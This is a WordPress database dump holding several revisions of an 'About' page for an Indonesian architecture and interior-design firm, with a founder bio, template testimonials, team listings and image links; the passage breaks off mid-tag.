INSERT INTO `wpev_posts` VALUES (4878,3,'2023-09-22 08:58:23','2023-09-22 08:58:23','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								John Alan							</h2>\n		<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.</p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"288\" height=\"286\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg 288w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan-150x150.jpg 150w\" sizes=\"(max-width: 288px) 100vw, 288px\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:082297775589 \">\n													0822 9777 5589												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 08:58:23','2023-09-22 08:58:23','',38,'https://bauhaus.futuremediatrix.com/?p=4878',0,'revision','',0),(4879,3,'2023-09-22 08:58:23','2023-09-22 08:58:23','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								John Alan							</h2>\n		<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.</p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"288\" height=\"286\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg 288w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan-150x150.jpg 150w\" sizes=\"(max-width: 288px) 100vw, 288px\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or WhatsApp: 						\n					<ul>\n								<li>\n																					<a href=\"tel:082297775589 \">\n													0822 9777 5589												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 08:58:23','2023-09-22 08:58:23','',38,'https://bauhaus.futuremediatrix.com/?p=4879',0,'revision','',0),(4880,3,'2023-09-22 08:59:35','2023-09-22 08:59:35','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								John Alan							</h2>\n		<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.</p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"288\" height=\"286\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg 288w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan-150x150.jpg 150w\" sizes=\"(max-width: 288px) 100vw, 288px\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or WhatsApp: 						\n					<ul>\n								<li>\n																					<a href=\"tel:082297775589 \">\n													0822 9777 5589												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img 